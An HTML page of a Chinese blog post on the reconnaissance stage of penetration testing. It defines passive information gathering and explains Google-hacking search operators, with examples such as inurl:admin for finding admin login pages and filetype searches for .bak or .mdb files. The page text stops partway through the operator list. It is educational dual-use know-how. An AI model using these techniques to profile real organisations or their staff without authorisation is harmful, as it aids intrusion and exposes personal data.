<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="韩乔落">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
        
        
        
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://jelasin.github.io/2023/12/26/渗透手札之信息收集/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="概述信息收集是渗透测试技术的第一个也是最重要的步骤。工具大家可以自行查找，不只文中提到的工具，也可以在公众号或者github上找一些开源开源的武器库。 被动信息收集被动信息收集简介指通过公开渠道的可获得信息，与目标系统或者主机不产生直接的信息交互，以尽可能避免留下任何痕迹的信息收集方法。 被动信息收集的内容 IP地址段 域名信息 邮件地址 文档图片数据 公司地址 公司组织架构 联系电话&#x2F;">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透手札之信息收集">
<meta property="og:url" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/index.html">
<meta property="og:site_name" content="Jelasin">
<meta property="og:description" content="概述信息收集是渗透测试技术的第一个也是最重要的步骤。工具大家可以自行查找，不只文中提到的工具，也可以在公众号或者github上找一些开源开源的武器库。 被动信息收集被动信息收集简介指通过公开渠道的可获得信息，与目标系统或者主机不产生直接的信息交互，以尽可能避免留下任何痕迹的信息收集方法。 被动信息收集的内容 IP地址段 域名信息 邮件地址 文档图片数据 公司地址 公司组织架构 联系电话&#x2F;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240203160434673.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240203160416941.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240415203212900.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240415203317189.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416143400643.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416153627577.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416153604311.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416160852538.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416161003650.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416162136473.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416162056606.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416162239143.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416162907217.png">
<meta property="og:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240416170447482.png">
<meta property="article:published_time" content="2023-12-26T10:54:55.000Z">
<meta property="article:modified_time" content="2024-04-28T11:47:36.750Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="信息收集">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jelasin.github.io/2023/12/26/%E6%B8%97%E9%80%8F%E6%89%8B%E6%9C%AD%E4%B9%8B%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/image-20240203160434673.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/favicon.ico" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/favicon.ico">
    <!--- Page Info-->
    
    <title>
        
            渗透手札之信息收集 -
        
        Jelasin
    </title>

    <link rel="stylesheet" href="//evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/fonts/Chillax/chillax.css">

    <!--- Inject Part-->
    

    
        <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    <script src="https://evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/js/libs/anime.min.js"></script>
    <h1 class="ml13">
        Jelasin
    </h1>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });


        anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [100,0],
                translateZ: 0,
                opacity: [0,1],
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i
            }).add({
            targets: '.ml13 .letter',
            translateY: [0,-100],
            opacity: [1,0],
            easing: "easeInExpo",
            duration: 1200,
            delay: (el, i) => 100 + 30 * i
        });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            hidePreloaderAfterTimeout(1000); // Hide after 1000 milliseconds once the window has loaded
        });

        // Backup failsafe: Hide preloader after a maximum of 5000 milliseconds, regardless of the window load event
        hidePreloaderAfterTimeout(5000);

        function hidePreloaderAfterTimeout(delay) {
            setTimeout(function () {
                var preloader = document.querySelector('.preloader');
                preloader.style.opacity = '0';
                setTimeout(function () {
                    preloader.style.display = 'none';
                }, 200);
            }, delay);
        }
    </script>
</div>
    

    
<link rel="stylesheet" href="/css/style.css">


    
        <link rel="stylesheet" href="//evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/assets/build/styles.css">
    

    <link rel="stylesheet" href="//evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/fonts/fonts.css">
    <link rel="stylesheet" href="//evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/fonts/Satoshi/satoshi.css">
    <!--- Font Part-->
    
    
    
    


    <script id="hexo-configurations">
    window.config = {"hostname":"jelasin.github.io","root":"/","language":"en","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"5rem","h2":"4rem","h3":"2.8rem","h4":"2.5rem","h5":"2.2rem","h6":"2rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":false,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":"Noto Sans SC","url":"https://fonts.googleapis.com/css2?family=Noto+Sans+SC:wght@400;500;700&display=swap"},"english":{"enable":false,"family":"Farsan","url":"https://fonts.googleapis.com/css2?family=Farsan&display=swap"}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":true,"percentage":true},"website_counter":{"url":"https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js","enable":true,"site_pv":false,"site_uv":false,"post_pv":true},"single_page":true,"preloader":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"“会当身由己，婉转入江湖”","subtitle":{"text":["Loading..."],"hitokoto":{"enable":true,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":null,"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.6.1","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives","icon":"fa-regular fa-archive"},"Links":{"icon":"fa-regular fa-link","submenus":{"看雪":"https://bbs.kanxue.com/homepage-958172.htm","吾爱破解":"https://www.52pojie.cn/home.php?mod=space&uid=2101606&do=thread&view=me&from=space","中国诗歌网":"https://www.zgshige.com/c/2022-04-13/21151100.shtml"}}},"search":{"enable":true,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":{"Essays":{"path":"/essays","icon":"fa-regular fa-comment"},"Categories":{"path":"/categories","icon":"fa-regular fa-folder"},"AI":{"path":"/AI","icon":"fa-brands fa-python"},"IOT":{"path":"/IOT","icon":"fas fa-network-wired"},"CTF":{"path":"/CTF","icon":"fa-solid fa-snowflake"},"Web":{"path":"/Web","icon":"fa-solid fa-shield"},"Linux":{"path":"/Linux","icon":"fa-brands fa-linux"},"Android":{"path":"/Android","icon":"fa-brands fa-android"},"Windows":{"path":"/Windows","icon":"fa-brands fa-windows"}}},"article_date_format":"auto","categories":{"enable":true,"limit":4},"tags":{"enable":true,"limit":4}},"footerStart":"2023/9/20 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    <link rel="stylesheet" href="//evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/fontawesome/fontawesome.min.css">
    <link rel="stylesheet" href="//evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/fontawesome/brands.min.css">
    <link rel="stylesheet" href="//evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/fontawesome/solid.min.css">
    <link rel="stylesheet" href="//evan.beee.top/projects/hexo-theme-redefine@2.6.1/source/fontawesome/regular.min.css">
    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>


<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/favicon.ico">
                </a>
            
            <a class="logo-title" href="/">
                
                Jelasin
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="has-dropdown"
                                   href="#"
                                        onClick=&#34;return false;&#34;>
                                    <i class="fa-regular fa-link fa-fw"></i>
                                    LINKS
                                    <i class="fa-solid fa-chevron-down fa-fw"></i>
                                </a>

                                <!-- Submenu -->
                                
                                    <ul class="sub-menu">
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://bbs.kanxue.com/homepage-958172.htm">
                                                    看雪
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://www.52pojie.cn/home.php?mod=space&uid=2101606&do=thread&view=me&from=space">
                                                    吾爱破解
                                                </a>
                                            </li>
                                        
                                            <li>
                                                <a target="_blank" rel="noopener" href="https://www.zgshige.com/c/2022-04-13/21151100.shtml">
                                                    中国诗歌网
                                                </a>
                                            </li>
                                        
                                    </ul>
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item-sub text-base my-1.5 flex flex-col w-full">
                        
                        <div class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary cursor-pointer text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                             navbar-data-toggle="submenu-Links"
                        >
                            <span>
                                LINKS
                            </span>
                            
                                <i class="fa-solid fa-chevron-right fa-sm fa-fw transition-all"></i>
                            
                        </div>
                        

                        
                            <div class="flex-col items-start px-2 py-2 hidden" data-target="submenu-Links">
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://bbs.kanxue.com/homepage-958172.htm">看雪</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://www.52pojie.cn/home.php?mod=space&uid=2101606&do=thread&view=me&from=space">吾爱破解</a>
                                    </div>
                                
                                    <div class="drawer-navbar-item text-base flex flex-col justify-center items-start hover:underline active:underline hover:underline-offset-1 rounded-3xl">
                                        <a class=" text-third-text-color text-xl"
                                           target="_blank" rel="noopener" href="https://www.zgshige.com/c/2022-04-13/21151100.shtml">中国诗歌网</a>
                                    </div>
                                
                            </div>
                        
                    </li>
            

            
            
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/essays"
                        >
                            <span>Essays</span>
                            <i class="fa-regular fa-comment fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/categories"
                        >
                            <span>Categories</span>
                            <i class="fa-regular fa-folder fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/AI"
                        >
                            <span>AI</span>
                            <i class="fa-brands fa-python fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/IOT"
                        >
                            <span>IOT</span>
                            <i class="fas fa-network-wired fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/CTF"
                        >
                            <span>CTF</span>
                            <i class="fa-solid fa-snowflake fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/Web"
                        >
                            <span>Web</span>
                            <i class="fa-solid fa-shield fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/Linux"
                        >
                            <span>Linux</span>
                            <i class="fa-brands fa-linux fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/Android"
                        >
                            <span>Android</span>
                            <i class="fa-brands fa-android fa-sm fa-fw"></i>
                        </a>
                    </li>
                
                    
                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full active"
                           href="/Windows"
                        >
                            <span>Windows</span>
                            <i class="fa-brands fa-windows fa-sm fa-fw"></i>
                        </a>
                    </li>
                
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">28</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">16</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">34</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                <div class="w-full flex items-center pt-6 justify-start">
                    <h1 class="article-title-regular text-second-text-color text-4xl md:text-6xl font-bold px-2 sm:px-6 md:px-8 py-3">渗透手札之信息收集</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/images/touxiang.jpg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">韩乔落</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-12-26 18:54:55</span>
        <span class="mobile">2023-12-26 18:54:55</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-04-28 19:47:36</span>
            <span class="mobile">2024-04-28 19:47:36</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">信息收集</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>信息收集是渗透测试技术的第一个也是最重要的步骤。工具大家可以自行查找，不只文中提到的工具，也可以在公众号或者<code>github</code>上找一些开源开源的武器库。</p>
<h1 id="被动信息收集"><a href="#被动信息收集" class="headerlink" title="被动信息收集"></a>被动信息收集</h1><h2 id="被动信息收集简介"><a href="#被动信息收集简介" class="headerlink" title="被动信息收集简介"></a>被动信息收集简介</h2><p>指通过公开渠道的可获得信息，<strong>与目标系统或者主机不产生直接的信息交互</strong>，以尽可能避免留下任何痕迹的信息收集方法。</p>
<h2 id="被动信息收集的内容"><a href="#被动信息收集的内容" class="headerlink" title="被动信息收集的内容"></a>被动信息收集的内容</h2><ul>
<li>IP地址段</li>
<li>域名信息</li>
<li>邮件地址</li>
<li>文档图片数据</li>
<li>公司地址</li>
<li>公司组织架构</li>
<li>联系电话&#x2F;传真号码</li>
<li>人员姓名&#x2F;职务</li>
<li>目标系统使用的技术架构</li>
<li>公开的商用信息</li>
<li>……</li>
</ul>
<h2 id="被动信息收集的目的"><a href="#被动信息收集的目的" class="headerlink" title="被动信息收集的目的"></a>被动信息收集的目的</h2><p>被动信息收集是为了获取目标系统的基础架构以及目标主机的ip地址段以及该对象的域名信息，以达到使用所收集的信息去描述目标系统或者主机的目的，并对之后的一系列扫描工作做准备。</p>
<h2 id="被动信息收集方式"><a href="#被动信息收集方式" class="headerlink" title="被动信息收集方式"></a>被动信息收集方式</h2><h3 id="使用google搜索引擎"><a href="#使用google搜索引擎" class="headerlink" title="使用google搜索引擎"></a>使用google搜索引擎</h3><p><strong>google hacking</strong> 语法：</p>
<ul>
<li><p><code>intext</code>:<br>这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:<strong>intext:动网</strong>.将返回所有在网页正文部分包含<strong>”动网”</strong>的网页。</p>
</li>
<li><p><code>allintext</code>:</p>
<p>使用方法和intext类似.</p>
</li>
<li><p><code>intitle</code>:<br>和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索: <strong>intitle:安全天使</strong>. 将返回所有网页标题中包含”安全天使”的网页.同理allintitle:也同intitle类似.</p>
</li>
<li><p><code>cache</code>:<br>搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦.</p>
</li>
<li><p><code>define</code>:<br>搜索某个词语的定义,搜索: <strong>define:hacker</strong> ,将返回关于hacker的定义.</p>
</li>
<li><p><code>filetype</code>:<br>这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的对特定目标进行信息收集都需要用到这个.搜索指定类型的文件.例如输入: <strong>filetype:doc</strong>. 将返回所有以doc结尾的文件URL.当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富。</p>
</li>
<li><p><code>info</code>:<br>查找指定站点的一些基本信息.</p>
</li>
<li><p><code>inurl</code>:<br>搜索我们指定的字符是否存在于URL中.例如输入:inurl:admin,将返回N个类似于这样的连接:<a class="link"   target="_blank" rel="noopener" href="http://www.xxx.com/xxx/admin,%E7%94%A8%E6%9D%A5%E6%89%BE%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E9%99%86%E7%9A%84URL%E4%B8%8D%E9%94%99" >http://www.xxx.com/xxx/admin,用来找管理员登陆的URL不错 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>. allinurl也同inurl类似,可指定多个字符.</p>
</li>
<li><p><code>link</code>:<br> 例如搜索: <strong>link:<a class="link"   target="_blank" rel="noopener" href="http://www.example.com/" >www.example.com <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></strong> 可以返回所有和<a class="link"   target="_blank" rel="noopener" href="http://www.example.com做了链接的url/" >www.example.com做了链接的URL <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a>.</p>
</li>
<li><p><code>site</code>:<br> 这个也很有用,例如: <strong>site:<a class="link"   target="_blank" rel="noopener" href="http://www.example.com/" >www.example.com <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></strong>. 将返回所有和example.com这个站有关的URL.<br> 对了还有一些操作符也是很有用的:</p>
